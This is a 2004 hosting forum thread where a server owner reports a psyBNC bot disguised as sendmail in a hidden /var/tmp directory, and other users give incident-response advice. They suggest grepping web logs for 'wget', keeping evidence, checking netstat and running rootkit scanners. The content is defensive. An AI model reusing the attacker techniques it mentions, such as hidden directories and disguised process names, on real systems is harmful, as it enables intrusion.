Adwis
04-16-2004, 02:25 AM
what should i do ?
and i can't go to that directory.
what should i do
quote:
--------------------------------------------------------------------------------
gorgole was running [psyBNC] the process claimed to be [sendmail:
accepting connections
? c-leet]
The binary is located at: /var/tmp/.../vi
gorgole was running [psyBNC] the process claimed to be [sendmail:
accepting connections
? c-leet]
The binary is located at: /var/tmp/.../vi
Kick the user, delete the account check if the server has been comprimised
Rus
Steven
04-16-2004, 02:42 AM
/var/tmp/.../vi
that doesnt look to good. Do you have an old kernel on the box? Have you secured the server any? Do you get anything when you run:
for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
Adwis
04-16-2004, 03:05 AM
i dont know how to delete & clean this problem.
do you have any step by step instruction, please..
Steven
04-16-2004, 03:11 AM
Well unfortuantly its not a step by step thing. You could be rooted and have a backdoor, or it could be simple and just as a user. But in any case you should setup some measures to help prevent this in the future.
it can be as simple as rm -rf /var/tmp/.../ BUT i seriously suggest you hire someone to check it out before you remove the files so they can evaluate whats going on. There are many companys out there that can do this.
serverwizards
easyservermanagement
wemanageservers
rackaid
etc
Do not just remove the files!!! Those files are clues to when and who placed the bot on your system. If you must stop the bot immediately, dump netstat and ps screens to a text file. They can all be very useful in diagnosing who put the file on your system and when it was started. Also, hackers like to call files one thing when they actually do another.
In this situation, you should verify the inegrity of netstat and check for unusually ports. An external portscan would be useful as well in case there are modules altering the netstat results.
If the owner of the file is apache or root, then you may have been hacked. Tools like chkrootkit and rkhunter can be helpful but do not subsitute for a throrough security scan.
Steven
04-16-2004, 06:41 PM
Huck it depends on the control panel as to what the file will be owned by, for example cpanel's apache runs as the user nobody. :)
Yeah, I know that. I should have been more specific and said owned by the apache's user id or group id. I was speaking of apache in a generic sense. I've seen many different uid's for apache including but not limited to:
apache
httpd
http
httpdssl
httpds
admserv
server
and a few more......
boonchuan
04-17-2004, 10:33 AM
I suggest just reformat and reinstall to be 100% safe , u wont know if u have backdoors
